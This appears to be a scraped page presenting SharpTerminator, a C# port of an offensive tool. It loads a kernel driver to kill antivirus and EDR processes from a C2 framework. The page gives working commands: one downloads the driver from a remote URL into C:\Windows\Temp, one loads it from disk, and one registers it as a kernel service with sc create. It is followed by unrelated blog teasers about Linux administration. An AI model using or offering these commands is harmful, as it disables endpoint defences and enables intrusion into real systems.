C# port of ZeroMemoryEx’s Terminator, so all hail goes to him.
You can download the driver from a remote URL using SharpTerminator and load it to terminate AV/EDR processes, or you can directly load it to the disk to perform the same operation.
When using Remote URL, the driver is downloaded to “C:\Windows\Temp” and then loaded from there.
In fact, there is no difference between them; if you don’t want to use the upload function in your C2, you can use the other one.
Loading from remote url:
execute-assembly SharpTerminator.exe --url "http://remoteurl.com:80/Terminator.sys" Loading from disk:
execute-assembly SharpTerminator.exe --disk "C:\path\to\driver\Terminator.sys" If you get “Failed to register the process in the trusted list!” error you should add service manually:
sc create Terminator binPath= "C:\path\to\driver.sys" type= kernel start= demand A Plex Media Server Setup on Ubuntu 20.04 is one of the easiest ways to…
Most enterprise AI programs treat deployment as the destination. The business case is built around…
Introduction Bash scripting is a powerful way to automate Linux tasks, but writing a script…
Introduction A self-signed SSL certificate is a certificate that is created and signed by the…
Introduction Debugging is an important part of Bash scripting. When a script does not work…
Introduction Cron jobs are used in Linux to run commands or Bash scripts automatically at…